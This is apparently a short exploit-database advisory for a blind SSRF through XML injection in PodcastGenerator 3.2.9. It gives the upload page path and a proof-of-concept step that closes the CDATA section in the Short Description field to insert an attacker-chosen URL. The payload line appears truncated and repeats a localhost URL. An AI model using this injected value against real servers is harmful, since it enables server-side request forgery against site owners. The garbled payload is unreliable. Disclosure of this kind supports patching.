#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection #Application: PodcastGenerator #Version: v3.2.9 #Bugs: Blind SSRF via XML Injection #Technology: PHP #Vendor URL: https://podcastgenerator.net/ #Software Link: https://github.com/PodcastGenerator/PodcastGenerator #Date of found: 01-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php) 2. Fill all section and Short Description section set as 'test]]>( example :Attacker domain)http://localhost:3132http://localhost:3132http://localhost:3132